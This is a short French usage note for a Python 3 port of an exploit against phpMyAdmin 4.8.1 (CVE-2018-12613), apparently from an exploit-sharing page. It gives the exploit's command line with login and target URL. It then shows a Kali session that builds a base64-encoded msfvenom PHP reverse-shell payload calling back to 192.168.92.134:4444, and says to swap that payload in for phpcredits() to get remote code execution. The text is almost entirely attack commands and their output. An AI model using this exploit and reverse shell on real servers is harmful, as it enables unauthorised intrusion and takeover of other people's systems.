
Exploit autonome modifié porté pour Python 3
Exploit autonome modifié porté en Python 3. Testé sur Python 3.7.3, phpMyAdmin 4.8.1 tournant sur Ubuntu 16.04 Fonctionne uniquement sous Linux. Exploit original par SSD. Tout le crédit leur revient.
python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”
Résultats du code PHP stockés dans results.html
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
Utilisez le payload PHP de msfvenom à la place de phpcredits(); ci-dessus
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php
eval(base64_decode(ICAg...gfQo));